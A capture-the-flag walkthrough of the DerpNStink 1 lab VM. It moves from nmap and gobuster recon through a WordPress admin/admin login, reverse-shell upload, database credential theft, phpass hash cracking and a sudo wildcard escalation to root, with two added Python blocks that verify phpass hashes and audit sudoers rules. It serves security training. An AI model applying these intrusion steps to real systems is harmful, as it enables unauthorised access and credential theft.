DerpNStink1: CTF walkthrough

Introduction

Name: DerpNStink 1

Date of release: 9 Feb 2018

Author: Bryan Smith

Series: DerpNStink


Enumeration

We can search for the IP address of the VM with arp-scan:

[email protected]:~$ arp-scan --localnet
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
[redacted]            [redacted]                [redacted]
[redacted]            [redacted]                [redacted]
192.168.1.105         00:0c:29:29:33:ed         VMware, Inc.
192.168.1.105         ac:bc:32:80:fa:7f         (Unknown) (DUP: 2)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.450 seconds (104.49 hosts/sec). 4 responded
[email protected]:~$

Then, we can search for open ports:

[email protected]:~$ nmap -A -F -O -sV --reason 192.168.1.105

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-07 03:43 EST
Nmap scan report for 192.168.1.105
Host is up, received arp-response (0.00086s latency).
Not shown: 97 closed ports
Reason: 97 resets
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 64 vsftpd 3.0.2
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (EdDSA)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 00:0C:29:29:33:ED (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.86 ms 192.168.1.105

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.40 seconds
[email protected]:~$


First Flag

First of all, we have to add the derpnstink domain name to our /etc/hosts file, as this note on the web server tells us:

[email protected]:~$ curl http://192.168.1.105/webnotes/info.txt
<-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live --> 
[email protected]:~$

So, we simply have to execute this command:

[email protected]:~$ echo '192.168.1.105        derpnstink.local' >> /etc/hosts

Then, the first flag can be found in the source code of the index.html page.

[email protected]:~$ curl http://derpnstink.local |html2text
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1298  100  1298    0     0   1298      0  0:00:01 --:--:--  0:00:01  158k
h1 style="color:Purple; font-size:250%;">DeRPnStiNK
[derp.png] [stinky.png]
<--flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) -->
[email protected]:~$

Now, we can search for other directories or pages.

To do so, we first use gobuster. After a few seconds, the weblog directory appears.

[email protected]:~$ gobuster -u http://derpnstink.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://derpnstink.local
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307
[+] Expanded     : true
=====================================================
http://derpnstink.local/weblog (Status: 301)
http://derpnstink.local/php (Status: 301)
http://derpnstink.local/css (Status: 301)
http://derpnstink.local/js (Status: 301)
http://derpnstink.local/javascript (Status: 301)
http://derpnstink.local/temporary (Status: 301)
=====================================================
[email protected]:~$

Then, another scan shows us that it is a WordPress blog.

[email protected]:~$ gobuster -u http://derpnstink.local/weblog/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://derpnstink.local/weblog/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307
[+] Expanded     : true
=====================================================
http://derpnstink.local/weblog/wp-content (Status: 301)
http://derpnstink.local/weblog/wp-includes (Status: 301)
http://derpnstink.local/weblog/wp-admin (Status: 301)
=====================================================
[email protected]:~$ 

Finally, we can log in to the WordPress admin panel with the following credentials:

Username   Password
admin      admin

After a bit of searching, we can see that we can upload arbitrary files when we add a new slide.

[screenshot: PHP reverse shell]

Note that I used the basic php-reverse-shell from pentestmonkey, which gave me a first access to the system.

[screenshot: Low privilege shell]


Second Flag

Once on the system, we can log in to the MySQL service with the credentials found in the /var/www/html/weblog/wp-config.php file.

[email protected]:/var/www/html/weblog$ cat wp-config.php
cat wp-config.php
<?php
[..snip..]
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'mysql');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

After that, we can find the second flag in the wp_posts table of the wordpress database.

[email protected]:/var/www/html/weblog$ mysql -uroot -pmysql -Dwordpress
[..snip..]
mysql> use wordpress
use wordpress
Database changed
mysql> select * from wp_posts;
[..snip..]
| closed         | closed      |               | 2-revision-v1 |         |        | 2017-11-13 03:46:02 | 2017-11-13 03:46:02 |                       |           2 | http://derpnstink.local/weblog/2-revision-v1/               |          0 | revision  |                |             0 |
|  8 |           1 | 2017-11-13 05:39:11 | 0000-00-00 00:00:00 | flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
[..snip..]

Moreover, in the wp_users table another user is present: unclestinky.

mysql> select * from wp_users;
select * from wp_users;
+----+-------------+------------------------------------+---------------+------------------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+-------+
| ID | user_login  | user_pass                          | user_nicename | user_email                   | user_url | user_registered     | user_activation_key                           | user_status | display_name | flag2 |
+----+-------------+------------------------------------+---------------+------------------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+-------+
|  1 | unclestinky | $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 | unclestinky   | [email protected] |          | 2017-11-12 03:25:32 | 1510544888:$P$BQbCmzW/ICRqb1hU96nIVUFOlNMKJM1 |           0 | unclestinky  |       |
|  2 | admin       | $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ | admin         | [email protected]       |          | 2017-11-13 04:29:35 |                                               |           0 | admin        |       |
+----+-------------+------------------------------------+---------------+------------------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+-------+
2 rows in set (0.00 sec)

We can easily crack this WordPress (phpass) hash with hashcat.

[..snip..]
$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41:wedgie57

Session..........: hashcat
Status...........: Cracked
Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
Hash.Target......: $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
Time.Started.....: Wed Mar  7 12:57:55 2018 (1 min, 16 secs)
Time.Estimated...: Wed Mar  7 12:59:11 2018 (0 secs)
Guess.Base.......: File (Desktop/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:    37078 H/s (9.24ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 2801664/14344385 (19.53%)
Rejected.........: 0/2801664 (0.00%)
Restore.Point....: 2777088/14344385 (19.36%)
Candidates.#2....: westham76 -> wcw32792

Started: Wed Mar  7 12:57:51 2018
Stopped: Wed Mar  7 12:59:12 2018
[..snip..]

We can now use these credentials:

Username   Password
stinky     wedgie57
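As an added example (not part of the walkthrough), a Python re-implementation of the phpass portable hash that WordPress stores in user_pass: it shows that the cost character in "$P$B" means only 8192 MD5 rounds, which is why a rockyou run finished in about a minute, and it verifies the recovered password against the hash from the dump above.

```python
import hashlib
import hmac

# phpass uses its own 64-character alphabet, not the RFC 4648 base64 one.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def phpass_iterations(stored_hash: str) -> int:
    """MD5 rounds encoded in the 4th char: '$P$B' -> index 13 -> 2**13 = 8192 rounds."""
    if stored_hash[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    return 1 << ITOA64.index(stored_hash[3])

def _encode64(raw: bytes, count: int) -> str:
    """phpass's base64 variant: packs 3 bytes into 4 chars, low bits first."""
    out, i = [], 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def phpass_hash(password: str, setting: str) -> str:
    """Recompute the hash from its 12-char setting prefix ($P$ + cost char + 8-char salt)."""
    pw = password.encode()
    digest = hashlib.md5(setting[4:12].encode() + pw).digest()
    for _ in range(phpass_iterations(setting)):
        digest = hashlib.md5(digest + pw).digest()   # each round: MD5(prev_digest || password)
    return setting[:12] + _encode64(digest, 16)

def verify_phpass(password: str, stored_hash: str) -> bool:
    """Constant-time check of a candidate against a stored WordPress user_pass value."""
    if len(stored_hash) != 34 or stored_hash[:3] not in ("$P$", "$H$"):
        return False
    return hmac.compare_digest(phpass_hash(password, stored_hash), stored_hash)

# Hash taken from the wp_users dump above, together with the password hashcat recovered.
STINKY_HASH = "$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41"
```

At roughly 8192 MD5 calls per guess, a single GPU gets tens of thousands of guesses per second, which is the figure hashcat reports above; a modern site-wide password policy or a slower hash (bcrypt via a plugin) is the mitigation.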


Third Flag

The third flag can be found on the Desktop of the stinky user.

[email protected]:~/Desktop$ cat flag.txt
cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
[email protected]:~/Desktop

For the moment, the SSH service can only be used with a private key.

Fortunately for us, a private key is hidden in the /home/stinky/ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh folder.

[email protected]:~$ cat ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt
cat ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt
-----BEGIN RSA PRIVATE KEY-----
[..snip..]
-----END RSA PRIVATE KEY-----
[email protected]:~$

We can use this private key to log in to the system.

[email protected]:~$ ssh -i privatekey [email protected]
Ubuntu 14.04.5 LTS


                       ,~~~..
                       '  Derrrrrp  N  `
        ,~~~~,       |    Stink      | 
       / ,      \      ',  __ ,"
      /,~|__.      \/
     /~ (__)
    ()  ; (^)(^)':
        =;  _  ;
          ; """"  ;=
   {"}   ' '""' ' _{"}
   \/     >  <   __/
      \    ,"   ",  /
       \  "       /"
          "      "=
           >     <
          ="     "-
          -.   ,'
                ---'

Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

  Documentation:  https://help.ubuntu.com/

386 packages can be updated.
305 updates are security updates.

Last login: Wed Mar  7 08:33:30 2018 from 192.168.1.116
[email protected]:~$ 


Fourth Flag

After a bit of searching, we can find an interesting conversation located at ftp/files/network-logs/derpissues.txt and a pcap file in the user's Documents folder.

[email protected]:~$ cat ftp/files/network-logs/derpissues.txt 
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
[email protected]:~$ 
[email protected]:~$ 
[email protected]:~$ ls -la Documents/
total 4300
drwxr-xr-x  2 stinky stinky    4096 Nov 13 01:25 .
drwx------ 12 stinky stinky    4096 Mar  7 08:33 ..
-rw-r--r--  1 root   root   4391468 Nov 13 00:56 derpissues.pcap
[email protected]:~$

If we download and analyse this pcap file with Wireshark we can find the password of the mrderp user.

[screenshot: mrderp password]

Using the mrderp account, we find a strange file called helpdesk.log on the Desktop, which gives us a link to a pastebin page.

[email protected]:~/Desktop$ cat helpdesk.log
[..snip..]
Closed Ticket Notification

Thank you for contacting the Help Desk. Your ticket information and its resolution is
below. If you feel that the ticket has not been resolved to your satisfaction or you need additional
assistance, please reply to this notification to provide additional information.
If you need immediate help (i.e. you are within two days of a deadline or in the event of a
security emergency), call us or visit our Self Help Web page at https://pastebin.com/RzK9WfGw 
Note that the Help Desk's busiest hours are between 10 a.m. (ET)
and 3 p.m. (ET).
[..snip..]

If we take a look at this pastebin, we can see that the /etc/sudoers file appears to contain this rule.

[screenshot: sudoers rule]

This rule means that if we create a file named derpy in the /home/mrderp/binaries/ folder, we will be able to execute it with root privileges.

[email protected]:~$ mkdir binaries
[email protected]:~$ touch binaries/derpy.sh
[email protected]:~$ echo '/bin/bash' >> binaries/derpy.sh 
[email protected]:~$ chmod +x binaries/derpy.sh
[email protected]:~$ sudo binaries/./derpy.sh 
[email protected]:~# 
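A defender-side check for this class of sudo misconfiguration, added here as an example that is not part of the walkthrough: it parses sudoers-style rules and flags any command spec that lets the user run code of their own choosing as root. The sudoers content is a constructed sample (the page shows the real rule only as a screenshot); the mrderp line is modelled on the behaviour described above and is an assumption.

```python
import re

# Constructed sample sudoers content, not the CTF's real file.
SAMPLE_SUDOERS = """\
Defaults env_reset
# admins
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
mrderp  ALL=(ALL:ALL) /home/mrderp/binaries/derpy*
stinky  ALL=(root) NOPASSWD: /usr/bin/apt-get update
"""

# user_or_group  hosts=(runas) [TAG:] command[, command...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>[^\s=]+)=(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$"
)
TAG_RE = re.compile(r"^(?:[A-Z_]+:\s*)+")          # strips NOPASSWD:, SETENV:, ...
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

def audit_sudoers(text: str) -> list:
    """Return one finding per command spec that hands the caller arbitrary code execution."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m["cmds"].split(","):
            path = TAG_RE.sub("", cmd.strip()).split()[0]
            reasons = []
            if path == "ALL":
                reasons.append("ALL commands")
            if any(c in path for c in "*?["):
                reasons.append("wildcard in command path")
            if path.startswith(USER_WRITABLE_PREFIXES):
                reasons.append("command lives in a user-writable directory")
            if reasons:
                findings.append({"user": m["who"], "runas": m["runas"] or "root",
                                 "command": path, "reasons": reasons})
    return findings

def risky_non_admin_users(text: str) -> set:
    """Users flagged for a wildcard or writable-path command (ALL-for-admins rules are expected)."""
    return {f["user"] for f in audit_sudoers(text) if "ALL commands" not in f["reasons"]}
```

The fix for a rule like the mrderp one is to point sudo at a root-owned, non-writable absolute path with no glob, so the user can run exactly that program and nothing else.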

We have successfully gained root privileges and can read the last flag of the CTF.

[email protected]:~# cat /root/Desktop/flag.txt 
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
[..snip..]

[email protected]:~#


Flags

flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
